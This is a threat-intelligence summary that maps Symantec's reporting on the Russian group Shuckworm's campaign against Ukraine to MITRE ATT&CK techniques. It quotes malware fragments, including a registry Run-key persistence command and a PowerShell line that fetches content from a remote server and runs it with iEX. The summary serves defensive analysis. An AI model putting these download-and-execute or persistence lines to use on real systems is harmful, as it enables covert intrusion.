Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine

MITRE Techniques

• [T1059.001] PowerShell – Attackers used PowerShell scripts with obfuscation and multiple variants to evade detection. “More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts… with up to 25 new variants of the group’s scripts observed per month between January and April 2023.”
• [T1059.005] Visual Basic – VBScript-based backdoor execution via wscript.exe. “Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:”
• [T1023] Shortcut Modification – The malware creates and uses LNK shortcuts to execute PowerShell, enabling stealthy execution. “This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script.”
• [T1091] Replication Through Removable Media – USB drives used to drop the foto.safe file on targeted machines. “The foto.safe file is a Base64-encoded script” and “dropped by an infected USB key…”
• [T1027] Obfuscated/Encoded Files and Information – The foto.safe file is Base64-encoded and decodes into a PowerShell-based dropper. “The foto.safe file is a Base64-encoded script.”
• [T1060] Registry Run Keys/Startup Folder – Persistence via Run key to launch PowerShell. “Set-ItemProperty -path HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Name safe -Value …”
• [T1105] Ingress Tool Transfer – The dropper downloads additional content from remote HTTP servers. “$urLs = ‘http://’+ … +’/sleep.php’; iEX (New-Object Net.WebClient).UploadString($urls.ToLower(),”)”